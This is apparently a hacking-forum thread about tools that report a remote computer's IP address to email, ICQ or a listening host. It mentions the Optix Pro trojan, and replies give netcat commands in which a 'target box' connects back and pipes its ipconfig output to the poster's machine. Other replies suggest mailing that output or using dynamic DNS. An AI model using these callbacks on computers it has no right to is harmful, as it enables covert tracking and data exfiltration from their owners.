Need a simple ip notification tool that sends the ip of a computer each time internet connection is made to either email address or icq. Is there such a program.

Yes I have read the topics but optix pro is a trojan with a built in function that has icq notification. All I need is ip notification tool and not a trojan.

Searched for it and cant find. I found a few others but none of them work. Anyone know of program that sends to e-mail perhaps. Does anybody have the icq pager made by illwill?

Why not just run a netcat daemon on 127.0.0.1:
| CODE |
nc -vv -L -p [port] > targetIP.txt
|
... and then have the target box connect back to it? - That would expose it's IP.
Equally, to get a little more info, you could connect back like this:
| CODE |
ipconfig | nc [your box] [port]
|
And like this, you won't need to use any kiddie programs

3 cheers for intelligence and independance!

True, true... but some way or another, any 'notification tool' will have to ring home. Though I admit it's pretty stupid having it reveal the IP so easily

Well, e-mail is a bit safer.
as you can set it up anonymous and download anonymous.
but what i want is something else. (not asking for it, cuz one day i'll write it myself).
I've been thinking, i don't want to spam a mailbox.
So service an app on the remote box, that makes a note on a php (asp) page everytime the ip changes.

check "promote your software"section in the forums of areyoufearless.com for notification tools.
Or use postie.exe (small mailer) and mail the output of ipconfig to your e-mailaddress....
Maybe it's a good idea to register at dyndns.org.... They have software to automaticaly register a dynamic ip address to a given (free!) hostname everytime the IP changes,

thanks dmg postie.exe is the best way to send e mail without difficulty !
or suscribe a free dns like www.dyndns.org then install the client and you have a free domain name associated with the current ip of the computer....!
